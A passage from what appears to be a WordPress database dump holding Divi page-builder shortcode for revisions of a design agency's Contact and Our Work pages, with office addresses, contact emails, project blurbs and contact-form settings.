_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 20:19:18','2020-08-08 20:19:18','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(715,1,'2020-08-08 20:24:39','2020-08-08 20:24:39','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design\" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" 